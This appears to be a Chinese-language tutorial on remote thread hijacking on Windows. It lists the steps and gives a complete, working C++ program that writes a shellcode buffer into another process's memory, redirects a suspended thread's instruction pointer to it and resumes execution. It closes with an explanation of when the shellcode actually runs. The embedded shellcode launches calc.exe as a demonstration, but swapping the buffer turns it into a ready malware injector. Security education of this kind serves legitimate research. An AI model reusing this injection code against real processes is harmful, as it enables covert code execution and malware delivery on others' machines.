远程线程劫持的流程#
- 打开远程进程和线程
- 挂起目标线程
- 分配内存并写入 Shellcode
- 获取该线程的上下文
- 修改上下文中的指令指针(RIP/EIP)指向Shellcode地址
- 设置线程上下文
- 恢复线程执行
C++实现#
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
DWORD GetTargetThreadId(DWORD pid) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
if (Thread32First(hSnap, &te32)) {
do {
if (te32.th32OwnerProcessID == pid) {
CloseHandle(hSnap);
return te32.th32ThreadID;
}
} while (Thread32Next(hSnap, &te32));
}
CloseHandle(hSnap);
return 0;
}
int main() {
DWORD targetPID = 37904; // 目标进程PID
DWORD targetTID = GetTargetThreadId(targetPID);
if (!targetTID) {
std::cout << "[-] 未找到目标线程\n";
return -1;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, targetTID);
if (!hProcess || !hThread) {
std::cout << "[-] 无法打开进程或线程\n";
return -1;
}
// 分配内存
LPVOID pRemoteShellcode = VirtualAllocEx(hProcess, NULL, sizeof(buf),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
// 写入Shellcode
WriteProcessMemory(hProcess, pRemoteShellcode, buf, sizeof(buf), NULL);
// 挂起线程
SuspendThread(hThread);
// 修改上下文
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_CONTROL;
GetThreadContext(hThread, &ctx);
ctx.Rip = (DWORD64)pRemoteShellcode;
SetThreadContext(hThread, &ctx);
// 恢复执行
ResumeThread(hThread);
std::cout << "[+] 线程劫持成功,Shellcode 已执行\n";
CloseHandle(hThread);
CloseHandle(hProcess);
return 0;
}
关于执行时机#
一个常见的新手误区是:认为调用 ResumeThread 后,Shellcode 会立即执行。但实际情况并非如此。代码在执行结束后过一段时间才会执行shellcode。
因为当调用 SetThreadContext(hThread, &ctx) 并将 Rip 设置为远程 Shellcode 地址后,并没有让线程立即运行这段代码,而是在当这个线程被操作系统调度器重新投入运行时,目标线程才会从我们设置的 Rip 地址开始执行。
这就意味着:目标线程当前可能处于“挂起”、“等待消息”、“空闲”或“阻塞”状态,即使我们调用了 ResumeThread,也不能保证它立刻被调度执行。